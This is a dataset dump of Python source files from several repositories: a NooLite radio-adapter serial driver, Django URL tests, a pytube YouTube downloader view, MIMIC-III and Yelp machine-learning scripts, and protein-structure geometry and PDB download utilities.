metadata
dict | text
stringlengths 60
3.49M
|
---|---|
{
"source": "jeweljohnt/test",
"score": 2
}
|
#### File: NooLite_F/MTRF64/MTRF64Adapter.py
```python
import logging
from enum import IntEnum
from serial import Serial
from struct import Struct
from time import sleep
from threading import *
from queue import Queue, Empty
class Command(IntEnum):
OFF = 0,
BRIGHT_DOWN = 1,
ON = 2,
BRIGHT_UP = 3,
SWITCH = 4,
BRIGHT_BACK = 5,
SET_BRIGHTNESS = 6,
LOAD_PRESET = 7,
SAVE_PRESET = 8,
UNBIND = 9,
STOP_BRIGHT = 10,
BRIGHT_STEP_DOWN = 11,
BRIGHT_STEP_UP = 12,
BRIGHT_REG = 13,
BIND = 15,
ROLL_COLOR = 16,
SWITCH_COLOR = 17,
SWITCH_MODE = 18,
SPEED_MODE = 19,
BATTERY_LOW = 20,
SENS_TEMP_HUMI = 21,
TEMPORARY_ON = 25,
MODES = 26,
READ_STATE = 128,
WRITE_STATE = 129,
SEND_STATE = 130,
SERVICE = 131,
CLEAR_MEMORY = 132
class Mode(IntEnum):
TX = 0,
RX = 1,
TX_F = 2,
RX_F = 3,
SERVICE = 4,
FIRMWARE_UPDATE = 5
class ResponseCode(IntEnum):
SUCCESS = 0,
NO_RESPONSE = 1,
ERROR = 2,
BIND_SUCCESS = 3
class Action(IntEnum):
SEND_COMMAND = 0,
SEND_BROADCAST_COMMAND = 1,
READ_RESPONSE = 2,
BIND_MODE_ON = 3,
BIND_MODE_OFF = 4,
CLEAR_CHANNEL = 5,
CLEAR_MEMORY = 6,
UNBIND_ADDRESS_FROM_CHANNEL = 7,
SEND_COMMAND_TO_ID_IN_CHANNEL = 8,
SEND_COMMAND_TO_ID = 9
class IncomingDataException(Exception):
"""Base class for response exceptions."""
class OutgoingData(object):
mode = Mode.TX
action = Action.SEND_COMMAND
channel = 0
command = Command.OFF
format = 0
data = bytearray(4)
id = 0
def __repr__(self):
return "<Request (0x{0:x}), mode: {1}, action: {2}, channel: {3:d}, command: {4:d}, format: {5:d}, data: {6}, id: 0x{7:x}>".format(id(self), self.mode, self.action, self.channel, self.command, self.format, self.data, self.id)
class IncomingData(object):
mode = None
status = None
channel = None
command = None
count = None
format = None
data = None
id = None
def __repr__(self):
return "<Response (0x{0:x}), mode: {1}, status: {2}, packet_count: {3} channel: {4:d}, command: {5:d}, format: {6:d}, data: {7}, id: 0x{8:x}>".format(id(self), self.mode, self.status, self.count, self.channel, self.command, self.format, self.data, self.id)
_LOGGER = logging.getLogger("MTRF64USBAdapter")
_LOGGER.setLevel(logging.WARNING)
_LOGGER_HANDLER = logging.StreamHandler()
_LOGGER_HANDLER.setFormatter(logging.Formatter("%(asctime)s - %(levelname)s - %(message)s", "%Y-%m-%d %H:%M:%S"))
_LOGGER.addHandler(_LOGGER_HANDLER)
class MTRF64Adapter(object):
_packet_size = 17
_serial = None
_read_thread = None
_command_response_queue = Queue()
_incoming_queue = Queue()
_send_lock = Lock()
_listener_thread = None
_listener = None
_is_released = False
def __init__(self, port: str, on_receive_data=None):
self._serial = Serial(baudrate=9600)
self._serial.port = port
self._serial.open()
self._listener = on_receive_data
self._read_thread = Thread(target=self._read_loop)
self._read_thread.daemon = True
self._read_thread.start()
self._listener_thread = Thread(target=self._read_from_incoming_queue)
self._listener_thread.daemon = True
self._listener_thread.start()
def release(self):
self._is_released = True
self._serial.close()
self._incoming_queue.put(None)
self._listener = None
def send(self, data: OutgoingData) -> [IncomingData]:
responses = []
packet = self._build(data)
with self._send_lock:
_LOGGER.debug("Send:\n - request: {0},\n - packet: {1}".format(data, packet))
self._command_response_queue.queue.clear()
self._serial.write(packet)
try:
while True:
response = self._command_response_queue.get(timeout=2)
responses.append(response)
if response.count == 0:
break
except Empty as err:
_LOGGER.error("Error receiving response: {0}.".format(err))
# For NooLite.TX we should make a bit delay. Adapter send the response without waiting until command was delivered.
# So if we send new command until previous command was sent to module, adapter will ignore new command. Note:
if data.mode == Mode.TX or data.mode == Mode.RX:
sleep(0.2)
return responses
# Private
def _crc(self, data) -> int:
sum = 0
for i in range(0, len(data)):
sum = sum + data[i]
sum = sum & 0xFF
return sum
def _build(self, data: OutgoingData) -> bytes:
format_begin = Struct(">BBBBBBB4sI")
format_end = Struct("BB")
packet = format_begin.pack(171, data.mode, data.action, 0, data.channel, data.command, data.format, data.data, data.id)
packet_end = format_end.pack(self._crc(packet), 172)
packet = packet + packet_end
return packet
def _parse(self, packet: bytes) -> IncomingData:
if len(packet) != self._packet_size:
raise IncomingDataException("Invalid packet size: {0}".format(len(packet)))
format = Struct(">BBBBBBB4sIBB")
data = IncomingData()
start_byte, data.mode, data.status, data.count, data.channel, data.command, data.format, data.data, data.id, crc, stop_byte = format.unpack(packet)
if (start_byte != 173) or (stop_byte != 174) or (crc != self._crc(packet[0:-2])):
raise IncomingDataException("Invalid response")
return data
def _read_loop(self):
while True:
packet = self._serial.read(self._packet_size)
if self._is_released:
break
try:
data = self._parse(packet)
_LOGGER.debug("Receive:\n - packet: {0},\n - data: {1}".format(packet, data))
if data.mode == Mode.TX or data.mode == Mode.TX_F:
self._command_response_queue.put(data)
elif data.mode == Mode.RX or data.mode == Mode.RX_F:
self._incoming_queue.put(data)
else:
pass
except IncomingDataException as err:
_LOGGER.error("Packet error: {0}".format(err))
pass
def _read_from_incoming_queue(self):
while True:
input_data = self._incoming_queue.get()
if self._is_released:
break
if self._listener is not None:
self._listener(input_data)
```
|
{
"source": "jewells07/mumbleapi",
"score": 2
}
|
#### File: users/tests/test_urls.py
```python
from django.conf.urls import url
from django.urls import reverse , resolve
from rest_framework import status
from rest_framework.test import APITestCase
from users.views import (
followUser , users , UserProfileUpdate ,
ProfilePictureUpdate , usersRecommended ,
user , userMumbles, userArticles, passwordChange,
sendActivationEmail, sendActivationEmail , activate)
# Create your tests here.
class AccountTests(APITestCase):
def setUp(self):
pass
def test_users_url(self):
url = 'users-api:users'
reversed_url = reverse(url)
response = self.client.get('/api/users/')
self.assertEqual(resolve(reversed_url).func,users)
self.assertEqual(response.status_code, status.HTTP_200_OK)
def test_users_follow_url(self):
url = 'users-api:follow-user'
reversed_url = reverse(url,args=['praveen'])
self.assertEqual(resolve(reversed_url).func,followUser)
def test_user_profile_update_url(self):
url = 'users-api:profile_update'
reversed_url = reverse(url)
self.assertEqual(resolve(reversed_url).func.view_class,UserProfileUpdate)
def test_profile_update_photo_url(self):
url = 'users-api:profile_update_photo'
reversed_url = reverse(url)
resolved = resolve(reversed_url).func
self.assertEqual(resolved.view_class,ProfilePictureUpdate)
def test_users_recommended_url(self):
url = 'users-api:users-recommended'
reversed_url = reverse(url)
self.assertEqual(resolve(reversed_url).func,usersRecommended)
def test_user_url(self):
url = 'users-api:user'
reversed_url = reverse(url,args=['test'])
self.assertEqual(resolve(reversed_url).func,user)
def test_user_mumbles(self):
url = 'users-api:user-mumbles'
reversed_url = reverse(url,args=['test'])
self.assertEqual(resolve(reversed_url).func,userMumbles)
def test_user_articles_url(self):
url = 'users-api:user-articles'
reversed_url = reverse(url,args=['test'])
self.assertEqual(resolve(reversed_url).func,userArticles)
def test_user_password_url(self):
url = 'users-api:password-change'
reversed_url = reverse(url)
self.assertEqual(resolve(reversed_url).func,passwordChange)
def test_send_activation_email_url(self):
url = 'users-api:send-activation-email'
reversed_url = reverse(url)
self.assertEqual(resolve(reversed_url).func,sendActivationEmail)
def test_active_user_account_url(self):
url = 'users-api:verify'
reversed_url = reverse(url,args=['903u924u934u598348943','*&6g83chruhrweriuj'])
self.assertEqual(resolve(reversed_url).func,activate)
```
|
{
"source": "jewells07/YT_Downloader",
"score": 3
}
|
#### File: YT_Downloader/youtube_download/views.py
```python
from django.shortcuts import render, redirect
# pytube package for Download youtube video
from pytube import YouTube
import os
import threading
# Create your views here.
url = ''
class Complete(threading.Thread):
def __init__(self, url, res, homedir):
self.url = url
self.res = res
self.homedir = homedir
threading.Thread.__init__(self)
def run(self):
YouTube(self.url).streams.get_by_resolution(self.res).download(self.homedir + '/Downloads')
def ytb_down(request):
return render(request,'ytb_main.html')
def yt_download(request):
global url
url = request.GET.get('url')
# Create object for know which video download ..
try:
obj = YouTube(url)
resolutions = []
strm_all = obj.streams.filter(progressive = True, file_extension = 'mp4').all()
for i in strm_all:
resolutions.append(i.resolution)
resolutions = list(dict.fromkeys(resolutions))
embed_link = url.replace("watch?v=", "embed/")
path = "D:\\"
return render(request,'yt_download.html',{'rsl': resolutions, 'embd': embed_link })
except:
return render(request, 'Sorry Internet is Down')
def download_complete(request,res):
global url
homedir = os.path.expanduser("~")
# dirs = homedir + '/Downloads'
# print(f'Direct: ', f'{dirs}/Downloads')
if request.method == 'POST':
Complete(url, res, homedir).start()
# YouTube(url).streams.get_by_resolution(res).download(homedir + '/Downloads')
return render (request, 'download_complete.html')
else:
return render(request, 'sorry.html')
```
|
{
"source": "jewelltaylor/mimic3-benchmarks",
"score": 2
}
|
#### File: mimic3models/in_hospital_mortality/save_mimic_data.py
```python
from __future__ import absolute_import
from __future__ import print_function
import numpy as np
import argparse
import os
import imp
import re
from sklearn.preprocessing import StandardScaler
from sklearn.impute import SimpleImputer
from mimic3models import common_utils
from mimic3models.in_hospital_mortality import utils
from mimic3benchmark.readers import InHospitalMortalityReader
from mimic3models.preprocessing import Discretizer, Normalizer
def read_and_extract_features(reader, period, features):
ret = common_utils.read_chunk(reader, reader.get_number_of_examples())
# ret = common_utils.read_chunk(reader, 100)
X = common_utils.extract_features_from_rawdata(ret['X'], ret['header'], period, features)
return (X, ret['y'], ret['name'])
parser = argparse.ArgumentParser()
parser.add_argument('--data', type=str, help='Path to the data of in-hospital mortality task',
default=os.path.join(os.path.dirname(__file__), '../../data/in-hospital-mortality/'))
parser.add_argument('--output_dir', type=str, help='Directory relative which all output files are stored',
default='.')
args = parser.parse_args()
# Build readers, discretizers, normalizers
train_reader = InHospitalMortalityReader(dataset_dir=os.path.join(args.data, 'train'),
listfile=os.path.join(args.data, 'train_listfile.csv'),
period_length=48.0)
val_reader = InHospitalMortalityReader(dataset_dir=os.path.join(args.data, 'train'),
listfile=os.path.join(args.data, 'val_listfile.csv'),
period_length=48.0)
test_reader = InHospitalMortalityReader(dataset_dir=os.path.join(args.data, 'test'),
listfile=os.path.join(args.data, 'test_listfile.csv'),
period_length=48.0)
print('Reading data and extracting features ...')
(train_X, train_y, train_names) = read_and_extract_features(train_reader, "all", "all")
(val_X, val_y, val_names) = read_and_extract_features(val_reader, "all", "all")
(test_X, test_y, test_names) = read_and_extract_features(test_reader, "all", "all")
print(' train data shape = {}'.format(train_X.shape))
print(' validation data shape = {}'.format(val_X.shape))
print(' test data shape = {}'.format(test_X.shape))
print('Imputing missing values ...')
imputer = SimpleImputer(missing_values=np.nan, strategy='mean')
imputer.fit(train_X)
train_X = np.array(imputer.transform(train_X), dtype=np.float32)
val_X = np.array(imputer.transform(val_X), dtype=np.float32)
test_X = np.array(imputer.transform(test_X), dtype=np.float32)
print('Normalizing the data to have zero mean and unit variance ...')
scaler = StandardScaler()
scaler.fit(train_X)
train_X = scaler.transform(train_X)
val_X = scaler.transform(val_X)
test_X = scaler.transform(test_X)
train_data_output_path = f"{args.output_dir}/train_data.npy"
val_data_output_path = f"{args.output_dir}/val_data.npy"
test_data_output_path = f"{args.output_dir}/test_data.npy"
train_lbl_output_path = f"{args.output_dir}/train_lbl.npy"
val_lbl_output_path = f"{args.output_dir}/val_lbl.npy"
test_lbl_output_path = f"{args.output_dir}/test_lbl.npy"
np.save(train_data_output_path, train_X)
np.save(val_data_output_path, val_X)
np.save(test_data_output_path, test_X)
np.save(train_lbl_output_path, np.array(train_y))
np.save(val_lbl_output_path, np.array(val_y))
np.save(test_lbl_output_path, np.array(test_y))
```
|
{
"source": "Jewelryland/YelpRecSys",
"score": 2
}
|
#### File: YelpRecSys/RecSys/recsys_cbf.py
```python
__author__ = 'Adward'
# Python utils imports
import math
import os
import sys
from time import time
import sqlite3
# Standard scientific Python imports
import matplotlib.pyplot as plt
import numpy as np
# Import classifiers and performance metrics
from sklearn.preprocessing import *
from sklearn.feature_extraction import DictVectorizer
from sklearn.cross_validation import StratifiedKFold, ShuffleSplit
from sklearn.metrics import *
from sklearn.naive_bayes import GaussianNB
from sklearn.ensemble import RandomForestClassifier, GradientBoostingClassifier
from sklearn.decomposition import PCA
# Constant values
DATA_PATH = '/Users/Adward/OneDrive/YelpData/'
DB_PATH = os.path.join(DATA_PATH, 'yelp.sqlite')
n_sample = 2225213 # 1992542
review_class = [260492, 190048, 282115, 591618, 900940] # 2.6:1.9:2.8:5.9:9.0
earliest = {'day': 20041018, 'month': 200410, 'year': 2004}
latest = {'day': 20151224, 'month': 201512, 'year': 2015}
valid_states = ['AZ', 'NV', 'ON', 'WI', 'QC', 'SC', 'EDH', 'PA', 'MLN', 'BW', 'NC', "IL"]
applied_categories = {'Debt Relief Services', 'Armenian', 'Spine Surgeons', 'House Sitters', 'Taxidermy', 'Iberian', 'Pita', 'Beer Hall', 'Childproofing', 'Assisted Living Facilities', 'Rhinelandian', 'Oriental', 'Palatine', 'Carpenters', 'Choirs', 'Wok', 'Nursing Schools', 'Surf Shop', 'Perfume', 'Kitchen Incubators', 'Flowers', 'Swiss Food', 'Castles', 'Parenting Classes', 'Ferries', 'Donairs', 'Rest Stops', 'Gerontologists', 'Bike Sharing', 'Piano Stores', 'Trinidadian', 'Translation Services', 'Eastern European', 'College Counseling', 'Community Gardens', 'Wine Tasting Classes', 'Art Restoration', 'Slovakian', 'Backshop', 'Supper Clubs', 'Editorial Services', 'Dialysis Clinics', 'Childbirth Education', 'IP & Internet Law', 'Tax Law', 'Farming Equipment', 'Art Tours', 'Concept Shops', 'Mosques', 'Australian'}
# Loading samples from the database & pre-scale
def load_samples(attr_list, prescale=False, oversampling=(0, 0), elite_expand=False, state_all=False):
'''
:param attr_list: List[Str], containing the list of features to be selected and encoded
:param prescale: Bool, (when True) pre-scale features with too large range of values to expedite converging
:param oversampling: Tuple(Int), double review samples with star classes in range
:param elite_expand: Bool, (when True) encode 12 features related to user.elite as [elite20**] & elite-year-sum;
(when False) only 1 feature stands for elite-year-sum
:param state_all: Bool, (when True) occupies 39 features; (when False) using only 12 prime states PLUS OTHERS
:return: List[Dict], List[Int]
'''
t = time()
with sqlite3.connect(DB_PATH) as conn:
# conn.execute('CREATE TEMP TABLE tmp_b1 (business_id TEXT, avg_star_elite REAL)')
# conn.execute('CREATE TEMP TABLE tmp_b2 (business_id TEXT, avg_star_nonelite REAL)')
# conn.execute('INSERT INTO tmp_b1 (business_id, avg_star_elite) '
# 'SELECT business_id, AVG(average_stars) AS avg_star_elite FROM '
# '(review JOIN user USING (user_id)) WHERE elite!="" GROUP BY business_id')
# conn.execute('INSERT INTO tmp_b2 (business_id, avg_star_nonelite) '
# 'SELECT business_id, AVG(average_stars) AS avg_star_nonelite FROM '
# '(review JOIN user USING (user_id)) WHERE elite="" GROUP BY business_id')
# conn.execute('DROP TABLE IF EXISTS bstat_by_elite')
# conn.execute('CREATE TABLE bstat_by_elite (business_id TEXT, avg_star_elite REAL, avg_star_nonelite REAL)')
# conn.execute('INSERT INTO tmp_b SELECT * FROM '
# '((business LEFT OUTER JOIN tmp_b1 USING (business_id)) '
# 'LEFT OUTER JOIN tmp_b2 USING (business_id))')
# conn.row_factory = sqlite3.Row
cur = conn.execute('SELECT ' + ','.join(attr_list) +
' FROM ('
'(review JOIN (business JOIN b_category_pca USING (business_id)) USING (business_id)) '
'JOIN user '
'USING (user_id) )')
sample_matrix = [] # feature matrix to return
targets = [] # class vector
row_num = 0
for row in cur:
targets.append(row[0]) # review.stars
# construct temp feature dict
sample = {}
for j in range(1, len(attr_list)):
sample[attr_list[j]] = row[j]
# encode features for business.state
if ('business.state' in attr_list) and (not state_all) and (sample['business.state'] not in valid_states):
sample['business.state'] = 'OTH' # other 17 states with few business recorded
if ('user_state' in attr_list) and (not state_all) and (sample['user_state'] not in valid_states):
sample['user_state'] = 'OTH'
# Create elite-related features || encode elite-year-number
# if elite_expand:
# for year in range(earliest['year']+1, latest['year']+1):
# sample['elite'+str(year)] = 0
# if len(sample['elite']):
# elite_years = [int(y) for y in sample['elite'].split('&')]
# sample['elite'] = len(elite_years)
# for year in elite_years:
# sample['elite'+str(year)] = 1
# else:
# sample['elite'] = 0
# else:
# if len(sample['elite']):
# sample['elite'] = len(sample['elite'].split('&'))
# else:
# sample['elite'] = 0
# encode features of friends_stat
# encode features of business_avg_stars_by_elite
nan_list = ['avg_review_count', 'avg_votes', 'avg_star_elite', 'avg_star_nonelite']
for feat in nan_list:
if feat in attr_list and not sample[feat]:
sample[feat] = 0
# encode business.categories features
if 'cas' in attr_list:
cas = sample['cas'].split(';')
del sample['cas']
for i in range(3):
sample['ca_'+str(i)] = float(cas[i])
# for ca in applied_categories:
# sample['ca_'+ca] = 0
# if len(sample['categories']):
# categories = sample['categories'].split('&')
# for j in range(len(categories)):
# if categories[j] in applied_categories:
# sample['ca_' + categories[j]] = 1
# del sample['categories']
# process control & display
row_num += 1
# print(sample)
if row_num % 100000 == 0:
print("%.1f %%" % (row_num * 100 / n_sample))
sample_matrix.append(sample)
# oversampling some review star classes
if oversampling[0] <= targets[-1] <= oversampling[1]:
sample_matrix.append(sample)
targets.append(targets[-1])
# if row_num == 10000:
# break
print('Done with joining & collecting data from database, using ', time()-t, 's')
return sample_matrix, targets
def reform_features(sample_matrix, scaling=False):
t = time()
print('Start reforming categorical features using OneHotDecoding...')
print(sample_matrix[0])
dictVectorizer = DictVectorizer()
X = dictVectorizer.fit_transform(sample_matrix).toarray()
n_features = len(X[0])
if scaling:
# scaler = StandardScaler()
# X = scaler.fit_transform(X)
X = scale(X)
print('Feature Num.:', n_features)
print('Done with reforming categorical features, using ', time()-t, 's')
# print(X[0])
return X, n_features
def train_and_predict(X, y, div, model, n_features):
print('Starting 5-fold training & cross validating...')
# input()
# scores = cross_validation.cross_val_score(clf, data, target, cv=2, scoring='f1_weighted')
t = time()
scores = {'f1_by_star': [[] for i in range(5)], 'f1_weighted': [], 'mae': [], 'rmse': []}
feature_weights = np.zeros(n_features)
for train, test in div:
X_train = np.array([X[i] for i in train])
X_test = np.array([X[i] for i in test])
y_train = np.array([y[i] for i in train])
y_test = np.array([y[i] for i in test])
model.fit(X_train, y_train)
feature_weights += model.feature_importances_
y_pred = model.predict(X_test)
# Metrics below
f1_by_star = f1_score(y_true=y_test, y_pred=y_pred, average=None)
for i in range(5):
scores['f1_by_star'][i].append(f1_by_star[i])
# Calculate metrics for each label, and find their average, weighted by support
# (the number of true instances for each label).
# This alters ‘macro’ to account for label imbalance;
# it can result in an F-score that is not between precision and recall.
scores['f1_weighted'].append(f1_score(y_true=y_test, y_pred=y_pred, average='weighted'))
scores['mae'].append(mean_absolute_error(y_true=y_test, y_pred=y_pred))
scores['rmse'].append(mean_squared_error(y_true=y_test, y_pred=y_pred) ** 0.5)
print(classification_report(y_true=y_test, y_pred=y_pred), '\n')
# print(confusion_matrix(y_true=y_test, y_pred=y_pred), '\n', time()-t, 's used >>\n')
print(time()-t, 's used >>\n')
# scores = np.array(scores)
# print("Accuracy: %0.2f (+/- %0.2f)" % (scores.mean(), scores.std() * 2))
print('Done with 5-fold training & cross validating, using ', time()-t, 's')
print('F1-Score By Star Classes: %.3f | %.3f | %.3f | %.3f | %.3f'
% tuple([np.array(star).mean() for star in scores['f1_by_star']]))
print('F1-Score Weighted: %.3f' % (np.array(scores['f1_weighted']).mean()))
print('MAE: %.3f' % (np.array(scores['mae']).mean()))
print('RMSE: %.3f' % (np.array(scores['rmse']).mean()))
feature_weights /= len(div)
# print(feature_weights)
for i in range(n_features):
print('%.1f' % (feature_weights[i] * 100), end=' '),
if __name__ == '__main__':
test_flag = 0
for arg in sys.argv:
if arg.split('=')[0] == 'test':
test_flag = arg.split('=')[1]
attr_list = [
'review.stars', # target value, must be placed at this first place
'average_stars',
# 'avg_friends_star',
# 'avg_review_count',
# 'avg_star_elite',
# 'avg_star_nonelite',
# 'avg_votes',
# 'business.city', # occupies 380 features
'business.review_count',
'business.stars',
# 'business.state', # occupies 29 -> 13 features
# 'categories', # occupies 890 features
'cas',
'checkins',
'compliments',
# 'elite', # occupies 12 -> 1 feature(s)
'fans',
'review.votes',
'review_date',
'user.review_count',
'user.votes',
# 'user_state',
# 'weekends_open', # binary
'yelping_since',
]
samples, targets = load_samples(attr_list, prescale=False, oversampling=(1, 4))
samples, n_features = reform_features(samples, scaling=False)
n_samples = len(samples) # may be different from original n_sample in db !
print('n_samples:', n_samples)
# div = StratifiedKFold(targets, n_folds=5) # 5-Fold Cross Validation
div = ShuffleSplit(n_samples, n_iter=5, test_size=0.2, random_state=0)
if test_flag:
div = ShuffleSplit(n_samples, n_iter=1, test_size=0.2, random_state=0)
model = RandomForestClassifier(n_estimators=5, max_features='auto') # int(math.sqrt(n_features)))
# model = GradientBoostingClassifier(n_estimators=5, learning_rate=1, max_depth=2, random_state=0)
train_and_predict(samples, targets, div, model, n_features)
```
|
{
"source": "jewettaij/dlpdb",
"score": 4
}
|
#### File: dlpdb/dlpdb/coords2angles.py
```python
import sys
from math import sqrt, cos, sin, tan, acos, asin, atan, pi
# Sometimes this program pipes its output to other programs which halt early.
# Below we silently suppress the ugly "Broken pipe" message this generates:
import signal
signal.signal(signal.SIGPIPE, signal.SIG_DFL)
def length_v(r):
lsqd = 0.0
for d in range(0,len(r)):
lsqd += r[d]*r[d]
return sqrt(lsqd)
def inner_prod_v(r1,r2):
result = 0.0
for d in range(0,len(r1)):
result += r1[d]*r2[d]
return result
def Coords2AnglesLengths(r0, r1, r2):
r10 = [r1[0]-r0[0], r1[1]-r0[1], r1[2]-r0[2]]
r21 = [r2[0]-r1[0], r2[1]-r1[1], r2[2]-r1[2]]
l10 = length_v(r10)
l21 = length_v(r21)
# The bond angle is the angle between r10 and r21
cos_theta = -inner_prod_v(r10, r21) / (l10 * l21)
if (cos_theta > 1.0):
cos_theta = 1.0
elif (cos_theta < -1.0):
cos_theta = -1.0
theta = acos(cos_theta)
return (theta, l10, l21)
def Coords2Angles(r0, r1, r2):
theta, l10, l21 = Coords2AnglesLengths(r0, r1, r2)
return theta
def main():
if (len(sys.argv) > 3):
sys.stderr.write('Error (coords2angles): number of arguments should not exceed 2.\n'\
' (The two arguments correspond to the number of lines of\n'\
' text to omit from the beginning and end of the file, respectively.)\n'\
' If one argument is passed, then both are assumed to be the same.\n'\
' If no argument is passed, then by default, no data is ignored.\nExiting...\n\n')
sys.exit(-1)
# NOTE: The "truncate" arguments are not really supported any more. Instead
# use other scripts to post-process the results printed by this program.
elif (len(sys.argv) == 3):
truncate_a = int(sys.argv[1])
truncate_b = int(sys.argv[2])
elif (len(sys.argv) == 2):
truncate_a = int(sys.argv[1])
truncate_b = truncate_a
else:
truncate_a = 0
truncate_b = 0
coords_list = []
# Read the file
for line in sys.stdin:
line = line.strip()
if line == '':
coords = []
else:
# Each line should contain a list of 9 numbers separated by whitespace.
coords = list(map(float, line.split()))
if len(coords) != 3*3:
sys.stderr.write('Error(coords2angles.py):\n'+'Each line should either contain 9 numbers or be blank.\n')
sys.exit(-1)
coords_list.append(coords)
# Truncate the data we don't want.
# (Why? The residues at the beginning and ending of helices
# are less trustworthy then the residues in the middle.)
coords_list = coords_list[truncate_a:len(coords_list)-truncate_b]
N = len(coords_list)
for i in range(0,N):
if len(coords_list[i]) == 3*3:
r0 = [coords_list[i][3*0+0],
coords_list[i][3*0+1],
coords_list[i][3*0+2]]
r1 = [coords_list[i][3*1+0],
coords_list[i][3*1+1],
coords_list[i][3*1+2]]
r2 = [coords_list[i][3*2+0],
coords_list[i][3*2+1],
coords_list[i][3*2+2]]
theta, l10, l21 = Coords2AnglesLengths(r0, r1, r2)
sys.stdout.write(str(theta*180.0/pi)+" "+str(l10)+" "+str(l21)+'\n')
else:
# Otherwise, we write out impossible values to let the caller
# know that this particular angle could not be computed
sys.stdout.write('-360 -1 -1\n')
if __name__ == "__main__":
main()
```
#### File: dlpdb/dlpdb/coords2projected_dihedrals.py
```python
import sys
from math import sqrt, cos, sin, tan, acos, asin, atan, pi, floor
try:
from .closest_line_points import ClosestLinePoints
from .coords2dihedrals import Coords2DihedralsAnglesLengths,Coords2Dihedrals
except (ImportError, SystemError, ValueError):
# not installed as a package
from closest_line_points import ClosestLinePoints
from coords2dihedrals import Coords2DihedralsAnglesLengths,Coords2Dihedrals
import signal
signal.signal(signal.SIGPIPE, signal.SIG_DFL)
def Coords2ProjectedDihedralsLengths(r0, r1, r2, r3, branch_of_log=pi):
"""
Calculate the "projected" dihedral angle from the position of 4 atoms. I
define this as the difference in direction between two infinitely long lines
-The first line passes through the first two atoms (r0,r1).
-The other line (the "last line") passes through the last two atoms (r2,r3).
The "projected dihedral" angle can be thought of as the largest possible
apparent angle between these two lines when viewed from all possible
viewing directions. A pair of points (one on each line) is determined
that are closest to each other. The "projected dihedral" angle is the angle
one sees when viewing these two lines from direction of the axis connecting
these two closest points. If these 4 points are coplanar, the
"projected" dihedral angle between them is undefined.
"""
r10 = [r1[0]-r0[0],
r1[1]-r0[1],
r1[2]-r0[2]]
r32 = [r3[0]-r2[0],
r3[1]-r2[1],
r3[2]-r2[2]]
R1, R2 = ClosestLinePoints(r0, r2, r10, r32)
phi,theta0,theta1,l10,l21,l32 = Coords2DihedralsAnglesLengths(r0,
R1,
R2,
r3,
branch_of_log)
# (Note: theta0 and theta1 should both be approximately pi/2,
# so we don't bother to report these angles to the caller.)
return (phi, l10, l21, l32)
def Coords2ProjectedDihedrals(r0, r1, r2, r3, branch_of_log=pi):
phi,l01,l21,l32 = Coords2ProjectedDihedralsLengths(r0, r1, r2, r3)
return phi
def main():
branch_of_log = pi # by default, dihedral angles lie in range: [-180,180.0)
truncate_a = 0
truncate_b = 0
if (len(sys.argv) > 4):
sys.stderr.write('Error (coords2dihedrals): number of arguments should not exceed 3.\n'\
' If an odd-number of arguments are passed (1 or 3), then\n'
' the first argument is assumed to be the branch-of-log, a number which is\n'
' 0 and 360.0. This argument indicates where the discontinuity in the\n'
' dihedral angle is located. By default it is 0 degrees, which\n'
' corresponds to 4 atoms in the "cis" conformation.)\n'
' (The two arguments correspond to the number of lines of\n'\
' text to omit from the beginning and end of the file, respectively.)\n'\
' If one argument is passed, then both are assumed to be the same.\n'\
' If no argument is passed, then by default, no data is ignored.\nExiting...\n\n')
sys.exit(-1)
# NOTE: The "truncate" arguments are not really supported any more. Instead
# use other scripts to post-process the results printed by this program.
elif (len(sys.argv) == 4):
branch_of_log = float(sys.argv[1])
truncate_a = int(sys.argv[2])
truncate_b = int(sys.argv[3])
elif (len(sys.argv) == 3):
truncate_a = int(sys.argv[1])
truncate_b = int(sys.argv[2])
elif (len(sys.argv) == 2):
branch_of_log = float(sys.argv[1])
branch_of_log *= pi/180.0
coords_list = []
# Read the file
for line in sys.stdin:
line = line.strip()
# Each line should contain a list of 3 numbers separated by whitespace.
# If so, store the 3 numbers in a list variable (named xyz), and append
# it to the list of coordinates.
# However some lines might also be blank, in which case we append the
# empty list [] to the list of coordinates.
if line == '':
coords = []
else:
# Each line should contain a list of 3 numbers separated by whitespace.
coords = list(map(float, line.split()))
if len(coords) != 4*3:
sys.stderr.write('Error(coords2dihedrals):\n'+'Each line should either contain 12 numbers or be blank.\n')
sys.exit(-1)
coords_list.append(coords)
# Truncate the data we don't want.
# (Why? The residues at the beginning and ending of helices
# are less trustworthy then the residues in the middle.)
coords_list = coords_list[truncate_a:len(coords_list)-truncate_b]
N = len(coords_list)
for i in range(0,N):
if len(coords_list[i]) == 3*4:
r0 = [coords_list[i][3*0+0],
coords_list[i][3*0+1],
coords_list[i][3*0+2]]
r1 = [coords_list[i][3*1+0],
coords_list[i][3*1+1],
coords_list[i][3*1+2]]
r2 = [coords_list[i][3*2+0],
coords_list[i][3*2+1],
coords_list[i][3*2+2]]
r3 = [coords_list[i][3*3+0],
coords_list[i][3*3+1],
coords_list[i][3*3+2]]
phi,l10,l21,l32 = Coords2ProjectedDihedralsLengths(r0, r1, r2, r3,
branch_of_log)
sys.stdout.write(str(phi*180.0/pi) + ' ' +
str(l10) + ' ' +
str(l21) + ' ' +
str(l32) +
'\n')
else:
# Otherwise, we write out an impossible values to let the caller
# know that this particular dihedral angle could not be computed
sys.stdout.write('-720 -1 -1 -1\n')
if __name__ == "__main__":
main()
```
#### File: dlpdb/dlpdb/download_pdbs.py
```python
g_program_name = __file__.split('/')[-1]
g_date_str = '2021-1-24'
g_version_str = '0.6.0'
import sys, urllib, urllib.request, random, time, gzip
def FileExists(fname):
try:
file = open(fname, 'r')
except IOError:
exists = False
else:
exists = True
return exists
def ExtractFileName(url):
# The name of the file we create will be the same as the last few
# characters of the URL. (Whatever comes after the last '/' character.)
out_fname = url
slash_loc = out_fname.rfind('/')
if (slash_loc >= 0): # if '/' was found, then remove text preceeding '/'
out_fname = out_fname[slash_loc+1:]
if (out_fname == ''):
sys.stderr.write('Error: filename difficult to determine from URL:\n' +\
' \"'+url+'\"\n')
sys.exit(-1)
return out_fname
# This function downloads a file from a URL, and (if requested by the user)
# prints out a warning message if there was a problem.
import os
def DownloadFileTo(url, file_name, verbose_mode = True):
# Open the input file (at url) for reading
# Simple way:
# in_file = urllib.urlopen(url)
# But the web site may return garbage if the file doesn't exist.
# Instead, we check for errors first:
try: in_file = urllib.request.urlopen(url)
except urllib.error.URLError as e:
if (verbose_mode):
sys.stderr.write(str(e)+'\n')
sys.stderr.write(' omitting file \"'+file_name+'\"\n')
else:
if (verbose_mode):
sys.stderr.write('downloading file \"'+file_name+'\"\n')
# Open the output file for writing
out_file = open(file_name, 'wb')
out_file.write(in_file.read())
out_file.close()
# This version infers the file name from the URL.
